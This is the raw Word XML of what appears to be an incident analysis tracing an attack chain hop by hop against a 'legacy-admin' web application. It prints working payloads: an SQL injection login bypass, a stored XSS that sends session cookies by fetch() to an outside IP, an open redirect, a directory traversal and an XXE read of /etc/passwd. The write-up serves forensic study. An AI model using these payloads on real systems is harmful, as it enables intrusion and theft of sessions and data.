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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain Overview:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The initial compromise began with a SQL injection at the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> legacy-admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> login page from where the attacker was able to log in and obtain an administrator session, enumerate users, and conduct various types of post-authentication avenues of attack, including a stored XSS, an open redirect, directory traversal for arbitrary file read and an XML External Entity (XXE) attack on the import feature. It was through this combination of vulnerabilities that the attacker was finally able to exfiltrate the data dump comprising 312 rows of data saved in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">05-exfil-sample.csv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="3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6"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hop 1 – Authentication Bypass (SQL Injection)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Weakness: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/legacy-admin/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept: </w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /legacy-admin/login.php </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">username=admin' OR '1'='1 </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">password=anything</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Observable Result: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">302 Found → /legacy-admin/dashboard.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Session cookie issued (PHPSESSID=2a8f...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(02-attacker-http-capture.txt)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; [02:15:31]; POST https://sankofa.internal/legacy-admin/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Body:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username=admin' OR '1'='1&amp;password=anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">302 Found → /legacy-admin/dashboard.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands the next hop</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A valid authenticated administrator session.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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hop 2 – Administrative Enumeration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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticated access to privileged administration page</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /legacy-admin/users.php; Cookie: PHPSESSID=2a8f…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Result: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK; 312 user rows returned.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[02:16:04]; GET /legacy-admin/users.php; Response body includes 312 user rows.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands the next hop:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowledge of users and privileged application functionality</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6"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hop 3 – Stored Cross-Site Scripting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Weakness: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored Cross-Site Scripting (XSS)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Proof of Concept:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch('https://185.220.101.9:8443/c?'+document.cookie)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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;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Result:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200 OK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Capture: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[02:18:47]; POST /legacy-admin/comments/post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32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands the next hop: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Potential theft of administrator session cookies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6"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hop 4 – Open Redirect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Weakness: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Redirect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Proof of Concept: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /login.php?next=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://185.220.101.9:8443/redir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Result: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">302 Redirect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Capture: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[02:21:13]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2"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands the next hop: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ability to redirect legitimate users to attacker-controlled infrastructure</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hop 5 – Arbitrary File Read (Directory Traversal)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Weakness: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory Traversal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Proof of Concept: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /files/?path=/etc/passwd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Observable Result: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:x:0:0:root:/root:/bin/bash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Capture: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[02:24:02]</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands the next hop:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirms arbitrary server file disclosure</w:t>
      </w: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36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hop 6 – XML External Entity (XXE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is new evidence that is not reflected in the HTTP capture.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Weakness: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unsafe XML parser with external entity resolution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Proof of Concept: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; (later referenced as: &lt;field name="notes"&gt;&amp;xxe;&lt;/field&gt;)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Evidence:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 04-import-xxe.xml </w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovered WAF audit event: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2024-06-04T02:23:41Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Relationship to the Capture: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The XXE attempts to retrieve the same target file (/etc/passwd) that was requested through the web interface at 02:24:02, demonstrating two different file disclosure techniques against the same system.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32"/>
          <w:szCs w:val="3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32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands the next hop: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive operating-system files and application configuration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6"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hop 7 – Customer Data Exfiltration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 xml:space="preserve">Weakness: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful collection of customer data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1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
